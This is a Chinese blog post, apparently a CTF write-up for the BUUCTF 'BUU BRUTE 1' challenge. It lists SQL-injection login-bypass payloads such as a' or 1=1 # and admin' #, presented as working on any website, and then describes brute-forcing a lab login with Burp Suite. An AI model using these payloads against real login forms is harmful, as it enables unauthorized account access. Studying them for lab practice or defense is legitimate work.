buuctf-BUU BRUTE 1

本文介绍了万能账号和万能密码的概念,它们是用于登录未知账户的工具,具有多种格式变体。通过实例演示了如何使用这些工具进行账户和密码的猜测,以及在实际场景中使用BrupSuite进行密码爆破的过程,最终找到正确组合获取flag。
摘要由CSDN通过智能技术生成

在做这道题前,我们要先了解什么是万能账号与万能密码。顾名思义,就是可以 【登录任意网站】的账号和密码。

当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。

万能账号并不是一个真正意义上的账号,它是一种【拥有不同变体的格式】

需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d

数值型万能账号:

a or true #

a or 1 #

a or 1=1 #

a or true -- a

a or 1 -- a

a or 1=1 -- a

单引号字符型万能密码:

a' or true #

a' or 1 #

a' or 1=1 #

a' or true --a

a' or 1 -- a

a' or 1=1 -- a

双引号字符型万能密码:

a" or true #

a" or 1 #

a" or 1=1 #

a" or true -- a

a" or 1 -- a

a" or 1=1 -- a

万能账户使用:账号输入:【万能账户】,比如 a or true #

                         密码随便输入: 比如最简单的123456

当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码,同样,它也不是一个真正意义上的密码,而是一个【拥有不同变体的格式】

需要注意的是:万能密码中的 admin,必须是真实的用户名。

数值型万能密码:              admin #      admin -- a

单引号字符串型万能密码:admin' #    admin' -- a

双引号字符串型万能密码:admin” #    admin" -- a

万能密码的使用:用户名输入 【万能密码】,比如 admin’ #

                             密码随便输入,比如 123456

打开靶机后,我们可以看见一个登录界面,随机输入账号与密码,显示错误,那么Brup Suite进行爆破,找到正确账号为admin

然后,爆破密码。找到正确密码6490

最后,成功找到flag

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值